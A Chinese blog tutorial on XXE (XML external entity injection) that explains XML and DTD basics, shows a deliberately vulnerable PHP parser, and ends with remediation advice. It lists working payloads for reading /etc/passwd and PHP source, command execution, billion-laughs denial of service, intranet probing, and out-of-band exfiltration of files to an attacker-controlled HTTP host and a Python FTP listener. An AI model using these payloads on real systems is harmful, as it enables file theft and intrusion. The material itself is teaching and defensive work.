常见的Web漏洞——XXE(外部实体注入)

最新推荐文章于 2024-05-19 22:38:58 发布
最新推荐文章于 2024-05-19 22:38:58 发布
阅读量1.6w 收藏 12
点赞数 3
分类专栏: WEB渗透从入门到精通 文章标签: XXE漏洞 XML外部实体注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32261191/article/details/121582265
版权

XML和DTD基础

XML是可扩展性标记语言,类似HTML的标记语言,但标签是自定义的。
DTD是文档类型定义,用来为XML文档定义语义约束,可以在xml文件中声明,也可以在外部引用。
XML文件结构:

<? xml version="1.0" encoding="utf-8"?>
DTD部分(可选)
<root>Test</root>

支持的协议
Untitled.png

上图是默认支持协议,还可以支持其他,如PHP支持的扩展协议有
Untitled 1.png

DTD引用和实体声明

DTD内部声明:<!DOCTYPE 根元素 [实体声明]>
DTD外部引用:<!DOCTYPE 根元素名称 SYSTEM “外部DTD的URL”>
DTD内部实体声明:<!ENTITY 实体名称 “实体的值”>
DTD外部实体声明:<!ENTITY 实体名称 SYSTEM “URI/URL”>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY name "XXE test">]>
<root>&name;</root>

简介

XXE是XML外部实体(XML External Entity)注入的简称,在OWASP TOP 10 2017版中位居A4,属于严重级别的漏洞。此攻击可能导致任意文件读取,远程代码执行,拒绝服务,服务器端请求伪造,内网端口探测,以及其他系统影响。

漏洞成因

1、没有过滤用户提交的XML数据
2、使用的开发语言可以解析xml外部实体,如php环境中libxml库≤2.9.0默认启用了外部实体
PHP漏洞示例代码:

<? php
$xml=isset($_POST['xxe'])?simplexml_load_string($_POST['xxe']):" ";
print_r($xml)
?>

漏洞常见位置

1、涉及到提交xml数据的功能处
2、xml文件上传处
3、office文档上传预览处
4、某些json格式传递数据的地方,可以修改其Content-Type为application/xml,并尝试进行XXE注入

漏洞检测

有回显Payload

找到上传xml文件、引用外部xml文件或提交xml数据的位置,提交下列数据:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY name "XXE test">]>
<root>&name;</root>

页面返回XXE test字符说明存在xxe漏洞,如图:
Untitled 2.png

读取任意文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY name SYSTEM "file:///etc/passwd">]>
<root>&name;</root>
读取php文件
<!DOCTYPE root [
<!ENTITY name SYSTEM "php://filter/convert.base64-encode/resource=index.php">]>

读取/etc/passwd文件如图:

Untitled 3.png

读取php文件,如图:

Untitled 4.png

命令执行

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY name SYSTEM "except://ls">]>
<root>&name;</root>

Untitled7.png

拒绝服务攻击:

Untitled 5.png

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

内网探测

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY name SYSTEM "http://192.168.1.1">]>
<root>&name;</root>

无回显Payload

利用DNSLog检测

<?xml version=”1.0” encoding=”UTF-8”?>  
<!DOCTYPE ANY [
<!ENTITY name SYSTEM "http://h99ddx.dnslog.cn/eval.xml">]>
 <root>&name;</root>

Untitled 6.png

HTTP外带

Payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % remote SYSTEM "http://192.168.142.1:8888/evil.xml">
%remote;
%all;
%send;
]>
<root>&name;</root>

evil.xml

<!ENTITY % all "<!ENTITY % send SYSTEM 'http://192.168.142.1:8888/1.php?file=%file;'>">

FTP外带

xxeftp脚本

import socket

port=2121
s=socket.socket()
s.bind(('0.0.0.0',port))
s.listen()
print("FTP Server Listening on 0.0.0.0:"+str(port))
while 1:
	try:
		sock,addr=s.accept()
		print("Connected from "+addr[0]+":"+str(addr[1]))
		sock.send(b"220 FTP Server\n")
	except KeyboardInterrupt:
		sock.close()
		break
	while 1:
		try:
			data=sock.recv(10240)
			if b'USER' in data:
				sock.send(b'331 password please - version check\n')
			print(data.decode())
			sock.send(b"230 FTP Server\n")
		except:
			print("Remote Client Disconnected")
			break
s.close()

Payload

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://127.0.0.1:443/evil.dtd">
%asd;
%c;
]>
<a>&rrr;</a>

evil.dtd

<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://127.0.0.1:2121/%d;'>">

更多无回显XXE请查看相关文章

漏洞修复

1、禁用外部实体

PHP:libxml_disable_entity_loader(true); 
Java:DocumentBuilderFactory dbf   =DocumentBuilderFactory.newInstance();
      dbf.setExpandEntityReferences(false);
Python:from lxml import etree
   xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
其它语言:https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet

2、过滤关键字,如<!DOCTYPE 、<!ENTITY、SYSTEM和PUBLIC等

相关文章

https://security.tencent.com/index.php/blog/msg/69
http://blog.nsfocus.net/xml-dtd-xxe/
https://www.t00ls.cc/articles-32919.html
https://blog.csdn.net/u011721501/article/details/43775691

江左盟宗主
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB安全之XXE实体注入漏洞.pdf
12-12
WEB安全之XXE实体注入漏洞
WebSphere XML外部实体(XXE)注入漏洞(CVE-2020-4643)
10-25
WebSphere 9.0.0-9.0.5.5及8.5.0.0-8.5.5.18:更新安全补丁PH27509 WebSphere 8.0.0.0-8.0.0.15:升级到8.0.0.15版本,然后更新安全补丁PH27509 WebSphere 7.0.0.0-7.0.0.45:升级到7.0.0.45版本,然后更新安全补丁...
XXE漏洞详解(全网最详细)
qq_61553520的博客
05-09 3717
XXE:全称为XML Enternal Entity Injection,中文名称:XML外部实体注入
XXE外部实体注入
人若有志,就不会在半坡停止。
11-07 585
DTD全称是The document typedefinition,即是文档类型定义,可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于XML 文档中,也可作为一个外部引用。XXExml external entity injection)即xml外部实体注入漏洞XXE是针对应用程序解析XML输入类型的攻击。也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
34-XXEXML外部实体注入
最新发布
XLbb的博客
05-19 892
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。3、文档结构XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。4、基本的PAYLOAD结构:5、使用DTD实体的攻击方式 :DTD 引用方式(简要了解):1. DTD 内部声明DOCTYPE 根元素 [元素声明]>2. DTD 外部引用。
Xxe外部实体注入XML External Entity Injection)
xuyunpeng3189的博客
01-23 1086
无回显的xxe怎么利用 (1)使用dnslog平台进行数据外带 (2)构造远程dtd文件造成文件外泄 Xxe详细防御方法 禁用外部实体 这是防范最为严格的手段,从前面的学习我们已经知道XXE的全部利用手段基础都来源于外部实体注入, 也就是如果禁用了外部实体,那么XXE的所有攻击手段都将失效,无法再正常利用。 代码层禁用 PHP: libxml_disable_entity_loader(true); JAVA: DocumentBuilderFactory dbf =DocumentBuil
漏洞总结——XXEXML外部实体注入
Spontaneous_0的博客
09-08 460
XXE漏洞全称为 XML External Entity Injection,即XML外部实体注入XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载, 导致用户可以控制外部的加载文件,造成XXE漏洞
XML中DTD,Schema约束
linyaodonga的博客
07-08 239
什么是DTD约束: DTD(Document Type Definition)文档类型定义,用来约束xml文档, 规定xml文档中元素的名称,子元素的名称及顺序,元素的属性等。 什么是良好的XML 有且只有一个根元素 XML标签大小写正确区分 正确使用结束标签 正确嵌套标签 使用了合法的标签名 定义有效的属性 如下: <?xml version="1.0" encoding="...
XML中使用DTD
WilliamChancwl的博客
12-22 2039
使用DTD知识总结DTD介绍DTD的基本语法引入DTD的方式DTD中的元素DTD定义格式缺点 DTD介绍 DTD( Document Type Definition)文档类型定义。在XML标准中,描述了如何创建DTD,以及如何将它与根据它的规则所编写的XML文档相关联,并且还定义了XML处理器应该如何对DTD进行处理,有了DTD就可以检测XML文档的结构是否正确。 DTD在实际应用中的作用主要包...
未知攻焉知防——XXE漏洞攻防.pdf
09-18
未知攻焉知防——XXE漏洞攻防 自动化 应急响应 云安全 网络信息安全 安全威胁
XXE(XML 实体注入)漏洞攻防分析1
08-08
所以XXE和xss,sqli 等一样都是比较广泛的漏洞,所以从以往发现的漏洞可以看到很多厂商都存在这种漏洞,包括邮箱、门户、通用CMS等,如网易、腾讯邮箱XXE
Mybatis入门(一)
m0_67677436的博客
06-06 680
MyBatis是一个优秀的持久层框架(ORM),它对jdbc的数据库操作过程进行了封装,使开发者只用关注sql本身,而不用去处理注册驱动、创建connection、创建statement、手动设置参数、结果集检索等繁杂的代码。...
XML学习笔记 第二记
琴弦第七
06-18 1092
2012-08-07 1、XML实体可分为普通内部外部实体和内部外部参数实体。普通内部外部实体用在XML文档中,而内部外部参数实体用在DTD声明中。 2、DTD声明普通内部实体语法:,调用时用格式“&实体名;”。 3、DTD声明普通外部实体语法:,表示使用URI或者URL指向文件的全部内容替换实体名,比较少用,调用时用格式“&实体名;”。 4、DTD声明内部参数实体语法:,
关于xml学习(二)——xml的约束之DTD
IT一刻钟
12-30 530
什么是XML约束? 在XML技术里,可以编写一个文档来约束一个XML文档的书写规范,这称之为XML约束。 常用的约束技术:XML DTD,XML Schema
「 典型安全漏洞系列 」05.XML外部实体注入XXE详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-22 1374
标记:指计算机能理解的信息符号(标签),通过这些标签,计算机之间可以处理包含各种信息的HTML、文章等;可扩展性:使用者可以根据需要自行定义标签。下面是一个包含XML声明、文档类型定义(Document Type Definition,DTD)的XML文件样例。
【网络安全】web漏洞-xml外部实体注入(XXE)
A1_3_9_7的博客
12-28 1085
xml可拓展标记语言:xml是一种可拓展的标记语言,可以用来存储数据,例如:我们经常看到一些.xml的文件;它还可以用来传输数据,我们可以直接将数据以xml的格式放在请求当中,发给服务器。XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6413
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
XXE 原理漏洞详解
灰太的表格的博客
04-03 661
XXE 原理漏洞详解 1 什么是XXE漏洞 XXE漏洞全程XML External Entity Injection 即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取,命令执行 内网端口扫描 攻击内网网站 发起DOS攻击等危害 可以类比SQL注入解析传入SQL语句,解析XML语句 2 什么是XML 一种类似html的语...
关于xxe外部实体安全
04-27
XXE攻击是指攻击者通过XML实体注入漏洞,向应用程序中注入恶意的XML实体数据,从而导致应用程序解析XML实体时,触发攻击者构造的恶意行为。其中,外部实体注入攻击是XXE攻击中最常见的一种方式。 为了防止XXE攻击中的外部实体注入攻击,可以采取以下措施: 1. 禁止使用外部实体:在解析XML数据时,应该禁止使用外部实体。可以在解析XML数据时,设置解析器的属性,禁止使用外部实体。 2. 过滤用户输入:在接收用户输入时,应该对输入数据进行过滤和验证,确保输入数据符合预期的格式和内容。可以使用正则表达式等方法,对用户输入进行限制和过滤。 3. 使用安全的XML解析器:使用安全的XML解析器可以有效地避免XXE攻击。一些安全的XML解析器,如SAX、DOM4J等,在解析XML数据时,会默认禁止使用外部实体。 4. 加强安全审计:及时发现和修复应用程序中的安全漏洞,可以有效地避免XXE攻击的发生。因此,应该加强安全审计工作,定期对应用程序进行安全检测和评估。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值